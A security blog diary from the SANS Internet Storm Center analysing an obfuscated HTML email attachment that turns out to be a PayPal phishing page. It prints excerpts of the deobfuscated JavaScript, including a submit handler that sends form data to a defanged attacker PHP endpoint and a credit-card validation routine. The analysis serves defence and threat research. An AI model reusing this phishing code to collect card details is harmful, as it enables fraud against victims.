Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Internet Storm Center - Internet Security | DShield Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Nicely Obfuscated JavaScript Sample

Published: 2017-03-24
Last Updated: 2017-03-24 11:45:23 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

One of our readers sent us an interesting sample that was captured by his anti-spam. The suspicious email had an HTML file attached to it. By having a look at the file manually, it is heavily obfuscated and the payload is encoded in a unique variable:

var iKz7xb8 = "160b6e65697e737a6f0a627e67661416425e47460a464b444d17084f44081416424f4b4e1416
4b47434653100a0d784548455e450d060a5 ... ";

The file has a current VT score of 0/55 [1] and is "free" of malicious code, it is just a very nice Paypal phishing page:

The HTTP form data are sent to a rogue server but how to get it? To obtain more details about the malicious JavaScript code, it can be de-obfuscated with JSDetox[2] and some manual changes. The complete code can now be reviewed manually. The following function does the job:

<input type="button" class="ssP" onClick="ss()" value="Submit Form">
function ss(){
    if (!TLSPort()){
        return false;
    var GoogleAnalytics="hxxp://" + "86c2e66377265675a8a0edc1befe1837.php";

The TLSPort() function is just a validation function:

function TLSPort(){
    var CV=CValid(document.pF.pCC.value);
    if (!CV) return 0;
    var x=document.pF.pFN.value,y=document.pF.pEM.value,z=document.pF.pEY.value,\ 
    if (!v || !w || !x || y=="00" || z=="00") return 0;
    return 1;

CValid is used to verify the CC number provided by the victim:

function CValid(x){
    if (/[^0-9-\s]+/.test(x)) return false;
    var nn=0,nd=0,be=false;x=x.replace(/\D/g, "");
    for (var n=x.length - 1; n >=0; n--){
        var cd=x.charAt(n),nd=parseInt(cd, 10);
        if (be){
            if ((nd *=2) > 9) nd -=9
        nn +=nd;be=!be
    return (nn % 10)==0

Here is a valid POST to the attacker's server (using a test Visa number - 4111111111111111 - and fake data):


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

SSMA Usage
Mar 23rd 2017
1 day ago by Tom (1 comment)

"Blank Slate" malspam still pushing Cerber ransomware
Mar 22nd 2017
1 day ago by Brad (2 comments)

Malspam with password-protected Word documents
Mar 21st 2017
3 days ago by Brad (11 comments)

Searching for Base64-encoded PE Files
Mar 19th 2017
4 days ago by Xme (0 comments)

Example of Multiple Stages Dropper
Mar 18th 2017
6 days ago by Xme (3 comments)

View All Diaries →

Latest Discussions

CTI Summit Keynote - Cliff Stoll - (Still) Stalking the Wily Hacker
created Mar 11th 2017
1 week ago by Russell (1 reply)

Critical RCE on Apache Struts2 is being actively exploited [CVE-2017-5638]
created Mar 9th 2017
2 weeks ago by Anonymous (0 replies)

abnormal DNS queries mostly from AWS
created Mar 1st 2017
3 weeks ago by Anonymous (5 replies)

The format of BGP messages with routeviews
created Feb 22nd 2017
4 weeks ago by samara (3 replies)

Platform Markings on Headlines
created Feb 9th 2017
1 month ago by Anonymous (0 replies)

View All Forums →

Latest News

View All News →

Top Diaries DDoS Attack
Oct 21st 2016
5 months ago by Johannes (9 comments)

Malspam with password-protected Word documents
Mar 21st 2017
3 days ago by Brad (11 comments)

Microsoft Patch Tuesday Delayed
Feb 18th 2017
1 month ago by Johannes (7 comments)

How was your stay at the Hotel La Playa?
Feb 18th 2017
1 month ago by Xme (9 comments)

Critical Vulnerability in Cisco WebEx Chrome Plugin
Jan 24th 2017
1 month ago by Johannes (10 comments)